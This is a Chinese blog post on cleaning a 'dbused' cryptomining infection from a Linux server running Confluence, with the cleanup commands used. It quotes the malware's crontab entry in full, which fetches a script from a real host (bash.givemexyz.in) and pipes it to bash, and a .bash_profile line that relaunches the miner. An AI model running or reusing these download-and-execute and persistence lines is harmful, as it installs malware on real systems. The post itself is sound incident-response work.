参考文章:
解决挖矿病毒导致的cpu100%_Newbie_J的博客-CSDN博客
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程_gitTung的博客-CSDN博客_dbused
引言:直接影响,导致confluence无法使用。top时发现跟confluence账号相关,于是从这个方面着手,开始解决问题
1.进入 /var/spool/cron/ ,发现存在confluence5的一个定时任务,其内容如下:
* * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms将其删除,使用top命令找出dbused进程,杀掉。
2.执行service confluence start 命令,发现dbused进程又起来了,且在/var/spool/cron/ 又创建了一个定时任务。接下来开始排查什么触发了他的又一次执行。
思路两个方面:
1)定时任务 于是我先把定时关闭。
systemctl stop crond #关闭服务;
systemctl status crond #查看crontab服务状态
2)排查service启动服务时过程
service启动服务时,实际上是对应的 /etc/init.d目录下的文件。于是我们在目录下找到这个文件confluence5,文件内容如下:
#!/bin/bash # Confluence Linux service controller script cd "/opt/atlassian/confluence/bin" case "$1" in start) ./start-confluence.sh ;; stop) ./stop-confluence.sh ;; restart) ./stop-confluence.sh ./start-confluence.sh ;; *) echo "Usage: $0 {start|stop|restart}" exit 1 ;; esac
于是主要去排查/opt/atlassian/confluence/bin目录下文件,看有没有跟病毒相关的文件,找了一圈发现没有。但是在stop-confluence.sh文件中发现有切换用户的操作,于是猜想是否跟用户配置有关。
vim /home/confluence5/.bash_profile
发现在最后的确多了一行:
cp -f -r -- /tmp/.pwn/bprofr /tmp/dbused 2>/dev/null && /tmp/dbused -c >/dev/null 2>&1 && rm -rf -- /tmp/dbused 2>/dev/null
手动将其删掉,再source一下
再执行上面杀掉进程,结果发现,一会儿之后又起来了。并且这些垃圾代码又添加到了这几个文件上。
于是考虑将定时目录和bash_profile文件设置成只读。
设置成可以修改,删除,再设置成只读(为了防止他变化太快,将三行代码一起执行)
chattr -ia /var/spool/cron/;rm -rf confluence5;chattr +i /var/spool/cron/
将bash_profile代码改变之后,同样将其设置为只读
chattr +i /home/confluence5/.bash_profile
搞完这些之后,停掉dbused,结果发现又起来了
3.肯定是有些地方没清干净或者是有类似于守护进程相关的东西
于是我重点排查confluence5这个用户起的哪些进程
ps aux |grep conflue+:
conflue+ 301 0.0 0.0 113116 1436 ? SN 11:19 0:00 bash
conflue+ 345 0.0 0.0 229872 1984 ? SNl 11:20 0:00 /usr/local/aegis/AliSecGuard/AliSecGuard --stopdriver
conflue+ 30996 0.0 0.0 115504 2080 pts/3 S+ 11:16 0:00 bash
conflue+ 32664 0.0 0.0 115240 1404 ? SN 11:19 0:00 sh
conflue+ 32665 0.0 0.0 113116 1196 ? SN 11:19 0:00 /bin/bash
conflue+ 32667 0.0 0.0 113116 1424 ? SN 11:19 0:00 bash -sh
conflue+ 597 161 14.7 2434916 2400792 ? SNsl 11:20 0:51 dbused
conflue+ 679 0.0 0.0 232 96 ? SN 11:20 0:00 bashirc
conflue+ 699 0.0 0.0 113116 1188 ? SN 11:20 0:00 /bin/sh /dev/shm/cruner
conflue+ 701 0.0 0.0 107892 604 ? SN 11:20 0:00 sleep 60
conflue+ 754 0.0 0.0 115240 1408 ? SN 11:20 0:00 sh
conflue+ 755 0.0 0.0 113116 1192 ? SN 11:20 0:00 /bin/bash
conflue+ 757 0.0 0.0 113116 1468 ? SN 11:20 0:00 bash -sh
conflue+ 1098 0.0 0.0 107892 608 ? SN 11:21 0:00 sleep 1
root 1100 0.0 0.0 112664 976 pts/0 S+ 11:21 0:00 grep --color=auto conflue+
conflue+ 30996 0.0 0.0 115504 2080 pts/3 S+ 11:16 0:00 bash
可疑的程序有bashirc、 /dev/shm/cruner、和那个sleep1,同时在脏代码中发现tmp下也有些垃圾目录,所以我执行下列操作去杀进程和删除任务:
cd /tmp;rm -rf bashirc dbused .lock .pwn .python cruner;ps -ef | grep "conflue+"| awk '{print $2}'| xargs kill
执行完之后再执行 ps aux |grep conflue+ 看有没有死灰复燃,结果如下:
root 1100 0.0 0.0 112664 976 pts/0 S+ 11:21 0:00 grep --color=auto conflue+
conflue+ 30996 0.0 0.0 115504 2080 pts/3 S+ 11:16 0:00 bash
结果发现,他还在执行bash命令,但是其他东西没有起来,这就说明他执行脚本,结果文件没找到。到这就说明我们已经差不多清干净了。然后为了以防万一,我给他执行bash的这个进程也干掉了。
等半小时后在执行ps aux |grep conflue+ 和top查看,确认没有再起来。
命令总结:
#1.设置成可以修改,删除,再设置成只读(为了防止他变化太快,将三行代码一起执行)
chattr -ia /var/spool/cron/;rm -rf confluence5;chattr +i /var/spool/cron/
# 关闭定时
systemctl stop crond
#2.
vim /home/confluence5/.bash_profile
删除最后一行,wq保存。
source /home/confluence5/.bash_profile
#设置为只读
chattr +i /home/confluence5/.bash_profile
# 3.删除文件及杀掉任务
cd /tmp;rm -rf bashirc dbused .lock .pwn .python cruner;ps -ef | grep "conflue+"| awk '{print $2}'| xargs kill
# 4.开启定时
systemctl start crond
# 5.
使用ps aux |grep conflue+ 和top确认病毒线程是否还在
注意:我这使用ps aux |grep conflue+直接清进程是因为该用户下任务较少,如果是任务较多或root用户,需自行重新确认筛选词
扫一扫
512
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
